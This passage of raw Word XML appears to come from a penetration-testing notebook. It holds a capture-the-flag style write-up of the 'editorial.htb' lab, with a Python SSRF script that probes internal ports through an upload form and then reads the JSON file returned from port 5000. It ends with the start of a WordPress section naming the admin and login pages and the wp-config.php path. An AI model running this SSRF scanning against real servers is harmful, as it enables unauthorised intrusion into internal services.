            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">b''</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">for</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> port </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> range(1, 65535):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">with</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> open(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"a"</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'rb'</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as</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> file:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        data_post = {</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"bookurl"</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f"http://127.0.0.1:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{port}</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w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        data_file = {</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"bookfile"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: file}</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">try</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        r = requests.post(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"http://editorial.htb/upload-cover"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">,</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        files=data_file, data=data_post)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">if</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not</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> r.text.strip().endswith(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'.jpeg'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            print(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">f"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{port}</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> --- </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{r.text}</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w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">except</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> requests.RequestException </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">as</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> e:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        print(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">f"Error on port </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{port}</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{e}</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w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This script uses the requests library to send HTTP requests. It starts by creating an empty binary file named a , which serves as a placeholder for the bookfile in the POST request. The script then loops through all TCP ports from 1 to 65534. For each port, it opens the empty file and prepares the data for the POST request, setting bookurl to the local IP and the current port being tested. The script sends a POST request to http://editorial.htb/upload-cover , including the empty file and the URL data. After sending the request, it checks if the response does not end with a .jpeg extension. If a response is received that does not end with .jpeg , it prints the port number along with the response text. This helps identify ports that return unique content. Now, if we run the script, we see that port 5000 does not have a .jpeg extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 ssrf2.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5000 --- static/uploads/85389d97-3812-4851-b49e-1f843f356e45</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now go back to the web page and set that as our web URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="225" name="image211.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image211.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId948"/>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2CB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon checking the type of file, we find that it is JSON text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file 994d3f3a-23e7-4892-9bfc-01fac9bbd3b9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">994d3f3a-23e7-4892-9bfc-01fac9bbd3b9: JSON text data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now use the cat command to view the contents of the downloaded file and pipe the output through jq to format the JSON data neatly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat 994d3f3a-23e7-4892-9bfc-01fac9bbd3b9 |jq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C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BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4ooqp43mms9n" w:id="392"/>
      <w:bookmarkEnd w:id="392"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kteqs9l319o9" w:id="393"/>
      <w:bookmarkEnd w:id="393"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful pages:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1329"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's a login page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1329"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/html/wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1329"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to privilege escalate in Wordpress after getting terminal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
